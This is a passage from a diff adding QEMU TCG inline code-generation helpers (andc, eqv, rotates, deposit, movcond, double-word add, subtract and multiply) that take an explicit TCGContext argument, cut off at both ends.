TCGV_HIGH(ret), TCGV_HIGH(arg)); +#endif +} + +static inline void tcg_gen_discard_i32(TCGContext *s, TCGv_i32 arg) +{ + tcg_gen_op1_i32(s, INDEX_op_discard, arg); +} + +static inline void tcg_gen_discard_i64(TCGContext *s, TCGv_i64 arg) +{ +#if TCG_TARGET_REG_BITS == 32 + tcg_gen_discard_i32(s, TCGV_LOW(arg)); + tcg_gen_discard_i32(s, TCGV_HIGH(arg)); +#else + tcg_gen_op1_i64(s, INDEX_op_discard, arg); +#endif +} + +static inline void tcg_gen_andc_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_andc_i32) { + tcg_gen_op3_i32(s, INDEX_op_andc_i32, ret, arg1, arg2); + } else { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_not_i32(s, t0, arg2); + tcg_gen_and_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_andc_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ +#if TCG_TARGET_REG_BITS == 64 + if (TCG_TARGET_HAS_andc_i64) { + tcg_gen_op3_i64(s, INDEX_op_andc_i64, ret, arg1, arg2); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_not_i64(s, t0, arg2); + tcg_gen_and_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +#else + tcg_gen_andc_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_andc_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +#endif +} + +static inline void tcg_gen_eqv_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_eqv_i32) { + tcg_gen_op3_i32(s, INDEX_op_eqv_i32, ret, arg1, arg2); + } else { + tcg_gen_xor_i32(s, ret, arg1, arg2); + tcg_gen_not_i32(s, ret, ret); + } +} + +static inline void tcg_gen_eqv_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ +#if TCG_TARGET_REG_BITS == 64 + if (TCG_TARGET_HAS_eqv_i64) { + tcg_gen_op3_i64(s, INDEX_op_eqv_i64, ret, arg1, arg2); + } else { + tcg_gen_xor_i64(s, ret, arg1, arg2); + tcg_gen_not_i64(s, ret, ret); + } +#else + tcg_gen_eqv_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_eqv_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +#endif +} + +static inline void tcg_gen_nand_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_nand_i32) { + tcg_gen_op3_i32(s, INDEX_op_nand_i32, ret, arg1, arg2); + } else { + tcg_gen_and_i32(s, ret, arg1, arg2); + tcg_gen_not_i32(s, ret, ret); + } +} + +static inline void tcg_gen_nand_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ +#if TCG_TARGET_REG_BITS == 64 + if (TCG_TARGET_HAS_nand_i64) { + tcg_gen_op3_i64(s, INDEX_op_nand_i64, ret, arg1, arg2); + } else { + tcg_gen_and_i64(s, ret, arg1, arg2); + tcg_gen_not_i64(s, ret, ret); + } +#else + tcg_gen_nand_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_nand_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +#endif +} + +static inline void tcg_gen_nor_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_nor_i32) { + tcg_gen_op3_i32(s, INDEX_op_nor_i32, ret, arg1, arg2); + } else { + tcg_gen_or_i32(s, ret, arg1, arg2); + tcg_gen_not_i32(s, ret, ret); + } +} + +static inline void tcg_gen_nor_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ +#if TCG_TARGET_REG_BITS == 64 + if (TCG_TARGET_HAS_nor_i64) { + tcg_gen_op3_i64(s, INDEX_op_nor_i64, ret, arg1, arg2); + } else { + tcg_gen_or_i64(s, ret, arg1, arg2); + tcg_gen_not_i64(s, ret, ret); + } +#else + tcg_gen_nor_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_nor_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +#endif +} + +static inline void tcg_gen_orc_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_orc_i32) { + tcg_gen_op3_i32(s, INDEX_op_orc_i32, ret, arg1, arg2); + } else { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_not_i32(s, t0, arg2); + tcg_gen_or_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_orc_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ +#if TCG_TARGET_REG_BITS == 64 + if (TCG_TARGET_HAS_orc_i64) { + tcg_gen_op3_i64(s, INDEX_op_orc_i64, ret, arg1, arg2); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_not_i64(s, t0, arg2); + tcg_gen_or_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +#else + tcg_gen_orc_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_orc_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +#endif +} + +static inline void tcg_gen_rotl_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_rot_i32) { + tcg_gen_op3_i32(s, INDEX_op_rotl_i32, ret, arg1, arg2); + } else { + TCGv_i32 t0, t1; + + t0 = tcg_temp_new_i32(s); + t1 = tcg_temp_new_i32(s); + tcg_gen_shl_i32(s, t0, arg1, arg2); + tcg_gen_subfi_i32(s, t1, 32, arg2); + tcg_gen_shr_i32(s, t1, arg1, t1); + tcg_gen_or_i32(s, ret, t0, t1); + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + } +} + +static inline void tcg_gen_rotl_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_rot_i64) { + tcg_gen_op3_i64(s, INDEX_op_rotl_i64, ret, arg1, arg2); + } else { + TCGv_i64 t0, t1; + t0 = tcg_temp_new_i64(s); + t1 = tcg_temp_new_i64(s); + tcg_gen_shl_i64(s, t0, arg1, arg2); + tcg_gen_subfi_i64(s, t1, 64, arg2); + tcg_gen_shr_i64(s, t1, arg1, t1); + tcg_gen_or_i64(s, ret, t0, t1); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_rotli_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else if (TCG_TARGET_HAS_rot_i32) { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_rotl_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } else { + TCGv_i32 t0, t1; + t0 = tcg_temp_new_i32(s); + t1 = tcg_temp_new_i32(s); + tcg_gen_shli_i32(s, t0, arg1, arg2); + tcg_gen_shri_i32(s, t1, arg1, 32 - arg2); + tcg_gen_or_i32(s, ret, t0, t1); + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + } +} + +static inline void tcg_gen_rotli_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else if (TCG_TARGET_HAS_rot_i64) { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_rotl_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } else { + TCGv_i64 t0, t1; + t0 = tcg_temp_new_i64(s); + t1 = tcg_temp_new_i64(s); + tcg_gen_shli_i64(s, t0, arg1, arg2); + tcg_gen_shri_i64(s, t1, arg1, 64 - arg2); + tcg_gen_or_i64(s, ret, t0, t1); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_rotr_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_rot_i32) { + tcg_gen_op3_i32(s, INDEX_op_rotr_i32, ret, arg1, arg2); + } else { + TCGv_i32 t0, t1; + + t0 = tcg_temp_new_i32(s); + t1 = tcg_temp_new_i32(s); + tcg_gen_shr_i32(s, t0, arg1, arg2); + tcg_gen_subfi_i32(s, t1, 32, arg2); + tcg_gen_shl_i32(s, t1, arg1, t1); + tcg_gen_or_i32(s, ret, t0, t1); + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + } +} + +static inline void tcg_gen_rotr_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_rot_i64) { + tcg_gen_op3_i64(s, INDEX_op_rotr_i64, ret, arg1, arg2); + } else { + TCGv_i64 t0, t1; + t0 = tcg_temp_new_i64(s); + t1 = tcg_temp_new_i64(s); + tcg_gen_shr_i64(s, t0, arg1, arg2); + tcg_gen_subfi_i64(s, t1, 64, arg2); + tcg_gen_shl_i64(s, t1, arg1, t1); + tcg_gen_or_i64(s, ret, t0, t1); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_rotri_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + tcg_gen_rotli_i32(s, ret, arg1, 32 - arg2); + } +} + +static inline void tcg_gen_rotri_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + tcg_gen_rotli_i64(s, ret, arg1, 64 - arg2); + } +} + +static inline void tcg_gen_deposit_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, + TCGv_i32 arg2, unsigned int ofs, + unsigned int len) +{ + uint32_t mask; + TCGv_i32 t1; + + tcg_debug_assert(ofs < 32); + tcg_debug_assert(len <= 32); + tcg_debug_assert(ofs + len <= 32); + + if (ofs == 0 && len == 32) { + tcg_gen_mov_i32(s, ret, arg2); + return; + } + if (TCG_TARGET_HAS_deposit_i32 && TCG_TARGET_deposit_i32_valid(ofs, len)) { + tcg_gen_op5ii_i32(s, INDEX_op_deposit_i32, ret, arg1, arg2, ofs, len); + return; + } + + mask = (1u << (len & 0x1f)) - 1; + t1 = tcg_temp_new_i32(s); + + if (ofs + len < 32) { + tcg_gen_andi_i32(s, t1, arg2, mask); + tcg_gen_shli_i32(s, t1, t1, ofs); + } else { + tcg_gen_shli_i32(s, t1, arg2, ofs); + } + tcg_gen_andi_i32(s, ret, arg1, ~(mask << ofs)); + tcg_gen_or_i32(s, ret, ret, t1); + + tcg_temp_free_i32(s, t1); +} + +static inline void tcg_gen_deposit_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, + TCGv_i64 arg2, unsigned int ofs, + unsigned int len) +{ + uint64_t mask; + TCGv_i64 t1; + + tcg_debug_assert(ofs < 64); + tcg_debug_assert(len <= 64); + tcg_debug_assert(ofs + len <= 64); + + if (ofs == 0 && len == 64) { + tcg_gen_mov_i64(s, ret, arg2); + return; + } + if (TCG_TARGET_HAS_deposit_i64 && TCG_TARGET_deposit_i64_valid(ofs, len)) { + tcg_gen_op5ii_i64(s, INDEX_op_deposit_i64, ret, arg1, arg2, ofs, len); + return; + } + +#if TCG_TARGET_REG_BITS == 32 + if (ofs >= 32) { + tcg_gen_deposit_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), + TCGV_LOW(arg2), ofs - 32, len); + tcg_gen_mov_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1)); + return; + } + if (ofs + len <= 32) { + tcg_gen_deposit_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), + TCGV_LOW(arg2), ofs, len); + tcg_gen_mov_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1)); + return; + } +#endif + + mask = (1ull << len) - 1; + t1 = tcg_temp_new_i64(s); + + if (ofs + len < 64) { + tcg_gen_andi_i64(s, t1, arg2, mask); + tcg_gen_shli_i64(s, t1, t1, ofs); + } else { + tcg_gen_shli_i64(s, t1, arg2, ofs); + } + tcg_gen_andi_i64(s, ret, arg1, ~(mask << ofs)); + tcg_gen_or_i64(s, ret, ret, t1); + + tcg_temp_free_i64(s, t1); +} + +static inline void tcg_gen_concat_i32_i64(TCGContext *s, TCGv_i64 dest, TCGv_i32 low, + TCGv_i32 high) +{ +#if TCG_TARGET_REG_BITS == 32 + tcg_gen_mov_i32(s, TCGV_LOW(dest), low); + tcg_gen_mov_i32(s, TCGV_HIGH(dest), high); +#else + TCGv_i64 tmp = tcg_temp_new_i64(s); + /* These extensions are only needed for type correctness. + We may be able to do better given target specific information. */ + tcg_gen_extu_i32_i64(s, tmp, high); + tcg_gen_extu_i32_i64(s, dest, low); + /* If deposit is available, use it. Otherwise use the extra + knowledge that we have of the zero-extensions above. */ + if (TCG_TARGET_HAS_deposit_i64 && TCG_TARGET_deposit_i64_valid(32, 32)) { + tcg_gen_deposit_i64(s, dest, dest, tmp, 32, 32); + } else { + tcg_gen_shli_i64(s, tmp, tmp, 32); + tcg_gen_or_i64(s, dest, dest, tmp); + } + tcg_temp_free_i64(s, tmp); +#endif +} + +static inline void tcg_gen_concat32_i64(TCGContext *s, TCGv_i64 dest, TCGv_i64 low, + TCGv_i64 high) +{ + tcg_gen_deposit_i64(s, dest, low, high, 32, 32); +} + +static inline void tcg_gen_trunc_i64_i32(TCGContext *s, TCGv_i32 ret, TCGv_i64 arg) +{ + tcg_gen_trunc_shr_i64_i32(s, ret, arg, 0); +} + +static inline void tcg_gen_extr_i64_i32(TCGContext *s, TCGv_i32 lo, TCGv_i32 hi, TCGv_i64 arg) +{ + tcg_gen_trunc_shr_i64_i32(s, lo, arg, 0); + tcg_gen_trunc_shr_i64_i32(s, hi, arg, 32); +} + +static inline void tcg_gen_extr32_i64(TCGContext *s, TCGv_i64 lo, TCGv_i64 hi, TCGv_i64 arg) +{ + tcg_gen_ext32u_i64(s, lo, arg); + tcg_gen_shri_i64(s, hi, arg, 32); +} + +static inline void tcg_gen_movcond_i32(TCGContext *s, TCGCond cond, TCGv_i32 ret, + TCGv_i32 c1, TCGv_i32 c2, + TCGv_i32 v1, TCGv_i32 v2) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_mov_i32(s, ret, v1); + } else if (cond == TCG_COND_NEVER) { + tcg_gen_mov_i32(s, ret, v2); + } + else if (TCG_TARGET_HAS_movcond_i32) { + tcg_gen_op6i_i32(s, INDEX_op_movcond_i32, ret, c1, c2, v1, v2, cond); + } else { + TCGv_i32 t0 = tcg_temp_new_i32(s); + TCGv_i32 t1 = tcg_temp_new_i32(s); + tcg_gen_setcond_i32(s, cond, t0, c1, c2); + tcg_gen_neg_i32(s, t0, t0); + tcg_gen_and_i32(s, t1, v1, t0); + tcg_gen_andc_i32(s, ret, v2, t0); + tcg_gen_or_i32(s, ret, ret, t1); + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + } +} + +static inline void tcg_gen_movcond_i64(TCGContext *s, TCGCond cond, TCGv_i64 ret, + TCGv_i64 c1, TCGv_i64 c2, + TCGv_i64 v1, TCGv_i64 v2) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_mov_i64(s, ret, v1); + } else if (cond == TCG_COND_NEVER) { + tcg_gen_mov_i64(s, ret, v2); + } + else { +#if TCG_TARGET_REG_BITS == 32 + TCGv_i32 t0 = tcg_temp_new_i32(s); + TCGv_i32 t1 = tcg_temp_new_i32(s); + tcg_gen_op6i_i32(s, INDEX_op_setcond2_i32, t0, + TCGV_LOW(c1), TCGV_HIGH(c1), + TCGV_LOW(c2), TCGV_HIGH(c2), cond); + + if (TCG_TARGET_HAS_movcond_i32) { + tcg_gen_movi_i32(s, t1, 0); + tcg_gen_movcond_i32(s, TCG_COND_NE, TCGV_LOW(ret), t0, t1, + TCGV_LOW(v1), TCGV_LOW(v2)); + tcg_gen_movcond_i32(s, TCG_COND_NE, TCGV_HIGH(ret), t0, t1, + TCGV_HIGH(v1), TCGV_HIGH(v2)); + } else { + tcg_gen_neg_i32(s, t0, t0); + + tcg_gen_and_i32(s, t1, TCGV_LOW(v1), t0); + tcg_gen_andc_i32(s, TCGV_LOW(ret), TCGV_LOW(v2), t0); + tcg_gen_or_i32(s, TCGV_LOW(ret), TCGV_LOW(ret), t1); + + tcg_gen_and_i32(s, t1, TCGV_HIGH(v1), t0); + tcg_gen_andc_i32(s, TCGV_HIGH(ret), TCGV_HIGH(v2), t0); + tcg_gen_or_i32(s, TCGV_HIGH(ret), TCGV_HIGH(ret), t1); + } + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + #else + if (TCG_TARGET_HAS_movcond_i64) { + tcg_gen_op6i_i64(s, INDEX_op_movcond_i64, ret, c1, c2, v1, v2, cond); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + tcg_gen_setcond_i64(s, cond, t0, c1, c2); + tcg_gen_neg_i64(s, t0, t0); + tcg_gen_and_i64(s, t1, v1, t0); + tcg_gen_andc_i64(s, ret, v2, t0); + tcg_gen_or_i64(s, ret, ret, t1); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +#endif + } +} + +static inline void tcg_gen_add2_i32(TCGContext *s, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 al, + TCGv_i32 ah, TCGv_i32 bl, TCGv_i32 bh) +{ + if (TCG_TARGET_HAS_add2_i32) { + tcg_gen_op6_i32(s, INDEX_op_add2_i32, rl, rh, al, ah, bl, bh); + /* Allow the optimizer room to replace add2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + tcg_gen_concat_i32_i64(s, t0, al, ah); + tcg_gen_concat_i32_i64(s, t1, bl, bh); + tcg_gen_add_i64(s, t0, t0, t1); + tcg_gen_extr_i64_i32(s, rl, rh, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_sub2_i32(TCGContext *s, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 al, + TCGv_i32 ah, TCGv_i32 bl, TCGv_i32 bh) +{ + if (TCG_TARGET_HAS_sub2_i32) { + tcg_gen_op6_i32(s, INDEX_op_sub2_i32, rl, rh, al, ah, bl, bh); + /* Allow the optimizer room to replace sub2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + tcg_gen_concat_i32_i64(s, t0, al, ah); + tcg_gen_concat_i32_i64(s, t1, bl, bh); + tcg_gen_sub_i64(s, t0, t0, t1); + tcg_gen_extr_i64_i32(s, rl, rh, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_mulu2_i32(TCGContext *s, TCGv_i32 rl, TCGv_i32 rh, + TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_mulu2_i32) { + tcg_gen_op4_i32(s, INDEX_op_mulu2_i32, rl, rh, arg1, arg2); + /* Allow the optimizer room to replace mulu2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else if (TCG_TARGET_HAS_muluh_i32) { + TCGv_i32 t = tcg_temp_new_i32(s); + tcg_gen_op3_i32(s, INDEX_op_mul_i32, t, arg1, arg2); + tcg_gen_op3_i32(s, INDEX_op_muluh_i32, rh, arg1, arg2); + tcg_gen_mov_i32(s, rl, t); + tcg_temp_free_i32(s, t); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + tcg_gen_extu_i32_i64(s, t0, arg1); + tcg_gen_extu_i32_i64(s, t1, arg2); + tcg_gen_mul_i64(s, t0, t0, t1); + tcg_gen_extr_i64_i32(s, rl, rh, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_muls2_i32(TCGContext *s, TCGv_i32 rl, TCGv_i32 rh, + TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_muls2_i32) { + tcg_gen_op4_i32(s, INDEX_op_muls2_i32, rl, rh, arg1, arg2); + /* Allow the optimizer room to replace muls2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else if (TCG_TARGET_HAS_mulsh_i32) { + TCGv_i32 t = tcg_temp_new_i32(s); + tcg_gen_op3_i32(s, INDEX_op_mul_i32, t, arg1, arg2); + tcg_gen_op3_i32(s, INDEX_op_mulsh_i32, rh, arg1, arg2); + tcg_gen_mov_i32(s, rl, t); + tcg_temp_free_i32(s, t); + } else if (TCG_TARGET_REG_BITS == 32) { + TCGv_i32 t0 = tcg_temp_new_i32(s); + TCGv_i32 t1 = tcg_temp_new_i32(s); + TCGv_i32 t2 = tcg_temp_new_i32(s); + TCGv_i32 t3 = tcg_temp_new_i32(s); + tcg_gen_mulu2_i32(s, t0, t1, arg1, arg2); + /* Adjust for negative inputs. */ + tcg_gen_sari_i32(s, t2, arg1, 31); + tcg_gen_sari_i32(s, t3, arg2, 31); + tcg_gen_and_i32(s, t2, t2, arg2); + tcg_gen_and_i32(s, t3, t3, arg1); + tcg_gen_sub_i32(s, rh, t1, t2); + tcg_gen_sub_i32(s, rh, rh, t3); + tcg_gen_mov_i32(s, rl, t0); + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + tcg_temp_free_i32(s, t2); + tcg_temp_free_i32(s, t3); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + tcg_gen_ext_i32_i64(s, t0, arg1); + tcg_gen_ext_i32_i64(s, t1, arg2); + tcg_gen_mul_i64(s, t0, t0, t1); + tcg_gen_extr_i64_i32(s, rl, rh, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_add2_i64(TCGContext *s, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 al, + TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh) +{ + if (TCG_TARGET_HAS_add2_i64) { + tcg_gen_op6_i64(s, INDEX_op_add2_i64, rl, rh, al, ah, bl, bh); + /* Allow the optimizer room to replace add2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + tcg_gen_add_i64(s, t0, al, bl); + tcg_gen_setcond_i64(s, TCG_COND_LTU, t1, t0, al); + tcg_gen_add_i64(s, rh, ah, bh); + tcg_gen_add_i64(s, rh, rh, t1); + tcg_gen_mov_i64(s, rl, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_sub2_i64(TCGContext *s, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 al, + TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh) +{ + if (TCG_TARGET_HAS_sub2_i64) { + tcg_gen_op6_i64(s, INDEX_op_sub2_i64, rl, rh, al, ah, bl, bh); + /* Allow the optimizer room to replace sub2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + tcg_gen_sub_i64(s, t0, al, bl); + tcg_gen_setcond_i64(s, TCG_COND_LTU, t1, al, bl); + tcg_gen_sub_i64(s, rh, ah, bh); + tcg_gen_sub_i64(s, rh, rh, t1); + tcg_gen_mov_i64(s, rl, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_mulu2_i64(TCGContext *s, TCGv_i64 rl, TCGv_i64 rh, + TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_mulu2_i64) { + tcg_gen_op4_i64(s, INDEX_op_mulu2_i64, rl, rh, arg1, arg2); + /* Allow the optimizer room to replace mulu2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else if (TCG_TARGET_HAS_muluh_i64) { + TCGv_i64 t = tcg_temp_new_i64(s); + tcg_gen_op3_i64(s, INDEX_op_mul_i64, t, arg1, arg2); + tcg_gen_op3_i64(s, INDEX_op_muluh_i64, rh, arg1, arg2); + tcg_gen_mov_i64(s, rl, t); + tcg_temp_free_i64(s, t); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_mul_i64(s, t0, arg1, arg2); + gen_helper_muluh_i64(s, rh, arg1, arg2); + tcg_gen_mov_i64(s, rl, t0); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_muls2_i64(TCGContext *s, TCGv_i64 rl, TCGv_i64 rh, + TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_muls2_i64) { + tcg_gen_op4_i64(s, INDEX_op_muls2_i64, rl, rh, arg1, arg2); + /* Allow the optimizer room to replace muls2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else if (TCG_TARGET_HAS_mulsh_i64) { + TCGv_i64 t = tcg_temp_new_i64(s); + tcg_gen_op3_i64(s, INDEX_op_mul_i64, t, arg1, arg2); + tcg_gen_op3_i64(s, INDEX_op_mulsh_i64, rh, arg1, arg2); + tcg_gen_mov_i64(s, rl, t); + tcg_temp_free_i64(s, t); + } else if (TCG_TARGET_HAS_mulu2_i64 || TCG_TARGET_HAS_muluh_i64) { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + TCGv_i64 t2 = tcg_temp_new_i64(s); + TCGv_i64 t3 = tcg_temp_new_i64(s); + tcg_gen_mulu2_i64(s, t0, t1, arg1, arg2); + /* Adjust for negative inputs. */ + tcg_gen_sari_i64(s, t2, arg1, 63); + tcg_gen_sari_i64(s, t3, arg2, 63); + tcg_gen_and_i64(s, t2, t2, arg2); + tcg_gen_and_i64(s, t3, t3, arg1); + tcg_gen_sub_i64(s, rh, t1, t2); + tcg_gen_sub_i64(s, rh, rh, t3); + tcg_gen_mov_i64(s, rl, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + tcg_temp_free_i64(s, t2); + tcg_temp_free_i64(s, t3); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_mul_i64(s, t0, arg1, arg2); + gen_helper_mulsh_i64(s, rh, arg1, arg2); + tcg_gen_mov_i64(s, rl, t0); + tcg_temp_free_i64(s, t0); + } +} + +/***************************************/ +/* QEMU specific operations. Their type depend on the QEMU CPU + type. */ +#ifndef TARGET_LONG_BITS +#error must include QEMU headers +#endif + +#if TARGET_LONG_BITS == 32 +#define TCGv TCGv_i32 +#define tcg_temp_new(s) tcg_temp_new_i32(s) +#define tcg_global_reg_new tcg_global_reg_new_i32 +#define tcg_global_mem_new tcg_global_mem_new_i32 +#define tcg_temp_local_new(s) tcg_temp_local_new_i32(s) +#define tcg_temp_free tcg_temp_free_i32 +#define TCGV_UNUSED(x) TCGV_UNUSED_I32(x) +#define TCGV_IS_UNUSED(x) TCGV_IS_UNUSED_I32(x) +#define TCGV_EQUAL(a, b) TCGV_EQUAL_I32(a, b) +#define tcg_add_param_tl tcg_add_param_i32 +#define tcg_gen_qemu_ld_tl tcg_gen_qemu_ld_i32 +#define tcg_gen_qemu_st_tl tcg_gen_qemu_st_i32 +#else +#define TCGv TCGv_i64 +#define tcg_temp_new(s) tcg_temp_new_i64(s) +#define tcg_global_reg_new tcg_global_reg_new_i64 +#define tcg_global_mem_new tcg_global_mem_new_i64 +#define tcg_temp_local_new(s) tcg_temp_local_new_i64(s) +#define tcg_temp_free tcg_temp_free_i64 +#define TCGV_UNUSED(x) TCGV_UNUSED_I64(x) +#define TCGV_IS_UNUSED(x) TCGV_IS_UNUSED_I64(x) +#define TCGV_EQUAL(a, b) TCGV_EQUAL_I64(a, b) +#define tcg_add_param_tl tcg_add_param_i64 +#define tcg_gen_qemu_ld_tl tcg_gen_qemu_ld_i64 +#define tcg_gen_qemu_st_tl tcg_gen_qemu_st_i64 +#endif + +/* debug info: write the PC of the corresponding QEMU CPU instruction */ +static inline void tcg_gen_debug_insn_start(TCGContext *s, uint64_t pc) +{ + /* XXX: must really use a 32 bit size for TCGArg in all cases */ +#if TARGET_LONG_BITS > TCG_TARGET_REG_BITS + tcg_gen_op2ii(s, INDEX_op_debug_insn_start, + (uint32_t)(pc), (uint32_t)(pc >> 